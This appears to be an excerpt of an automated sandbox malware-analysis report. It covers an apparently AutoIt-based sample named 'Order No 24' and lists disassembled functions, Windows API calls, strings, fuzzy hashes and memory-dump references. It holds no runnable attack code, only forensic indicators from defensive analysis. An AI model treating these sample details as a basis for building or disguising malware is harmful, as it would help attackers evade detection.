                                                                                                                                  • Opcode Fuzzy Hash: 0907bc11a31f7ca73299fa0c4702a09d95d295a4591c1655245480670145c1f7
                                                                                                                                  • Instruction Fuzzy Hash: 7101D4B5641118ABCB04FBA4CD52AFE33ADBF85360B040A1DF462673D2EFB45908C7A0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 009BB6EB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                                  • Opcode ID: 5a510ed2646f0ce2c69b02458f385af35814a6eaf6fb8ba802226aef9f7a6e56
                                                                                                                                  • Instruction ID: 885e0fb1ef1a48c4ce083ed8b4d8932c8120acd691fc5f4143d2d3a1c4faaa10
                                                                                                                                  • Opcode Fuzzy Hash: 5a510ed2646f0ce2c69b02458f385af35814a6eaf6fb8ba802226aef9f7a6e56
                                                                                                                                  • Instruction Fuzzy Hash: A10162B5A41108ABCB14FBA4CA53BFE73AD9F45354F10002DB502B32D2EBA45E1897B5
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 009BB76C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                                  • Opcode ID: 0bdc322aa504e5afe943d9fe1da5d38b453ce78739bdc410e2f35239e1b250c6
                                                                                                                                  • Instruction ID: 8beda26d8876d06cd25bf7d1f37209e99bd3dcf3d656a06b5305efcb8a8a8c74
                                                                                                                                  • Opcode Fuzzy Hash: 0bdc322aa504e5afe943d9fe1da5d38b453ce78739bdc410e2f35239e1b250c6
                                                                                                                                  • Instruction Fuzzy Hash: B30162B6641104BBCB14FBA4DA52BFE73AC9F45354F50001AB402B32D2EBA45E1987B5
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                  • String ID: #32770
                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                  • Opcode ID: 183c3f18c17589a445c93d8e6370416463c3c0bd566fab9c39bfb11d09e1f036
                                                                                                                                  • Instruction ID: 5ab20bb47da1383560c7692a7d005378437d70a2ff66d4eae86dac505e9ef962
                                                                                                                                  • Opcode Fuzzy Hash: 183c3f18c17589a445c93d8e6370416463c3c0bd566fab9c39bfb11d09e1f036
                                                                                                                                  • Instruction Fuzzy Hash: 0EE09277A042282BDB10EAE5DC0AF87FBACAB91764F00001AB905E7081D760A60287D4
                                                                                                                                  APIs
                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009BA63F
                                                                                                                                    • Part of subcall function 009A13F1: _doexit.LIBCMT ref: 009A13FB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message_doexit
                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                                  • Opcode ID: 1478c414ff3aca1389538eec495883b796df7ac8a20cf9f5688793f84a626c61
                                                                                                                                  • Instruction ID: a601cf1138cf05495354a901236fe116a817ae3e04cb9f6e20366c89c0cb76f5
                                                                                                                                  • Opcode Fuzzy Hash: 1478c414ff3aca1389538eec495883b796df7ac8a20cf9f5688793f84a626c61
                                                                                                                                  • Instruction Fuzzy Hash: D3D05B323C432877D61436DC7C17FD5764C9B55B61F054416BB08D95C24DD2958142D9
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 009FACC0
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009FAEBD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                                  • String ID: WIN_XPe
                                                                                                                                  • API String ID: 510247158-3257408948
                                                                                                                                  • Opcode ID: 037c90c4d08a1837efb46421645e44f6d5d870b93d87c5ad6901ccfe96544600
                                                                                                                                  • Instruction ID: a4f3aa5fcf26bd500cbd09d97fcecb7f274e17c8c544080d54b83c0b72349f9e
• Opcode Fuzzy Hash: 037c90c4d08a1837efb46421645e44f6d5d870b93d87c5ad6901ccfe96544600
• Instruction Fuzzy Hash: 1DE065B5C0014DDFCB11DBE9D944AFCF7BCAB48300F108082E196B2160CB345A45DF21
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E86A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009E86B5
  • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 24191f869a45c2edc510e3d6735042827c04f04874ff4e5dbcdb8f9475498890
• Instruction ID: 4beecda42c57ad4fd3529971aac125f65afcbdd04f3b4c4f97df618bc4a810a7
• Opcode Fuzzy Hash: 24191f869a45c2edc510e3d6735042827c04f04874ff4e5dbcdb8f9475498890
• Instruction Fuzzy Hash: EFD01233798318BBE768A7F09C4FFC67A18AF44B11F100819B749AA1D0C9E1E942CB54
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E86E2
• PostMessageW.USER32(00000000), ref: 009E86E9
  • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: a700d01a96f740e53bfa98cc601d97043d436147d35e52ae7720e0d31e2cae28
• Instruction ID: eb8b54abff5f1af58370302c5dfa56da5d7cb4f31458227ab19213a80e9423f5
• Opcode Fuzzy Hash: a700d01a96f740e53bfa98cc601d97043d436147d35e52ae7720e0d31e2cae28
• Instruction Fuzzy Hash: AED0C9327853187BE668A7F09C4BFC66A18AB44B11F100819B645AA1D0C9A1A9428A55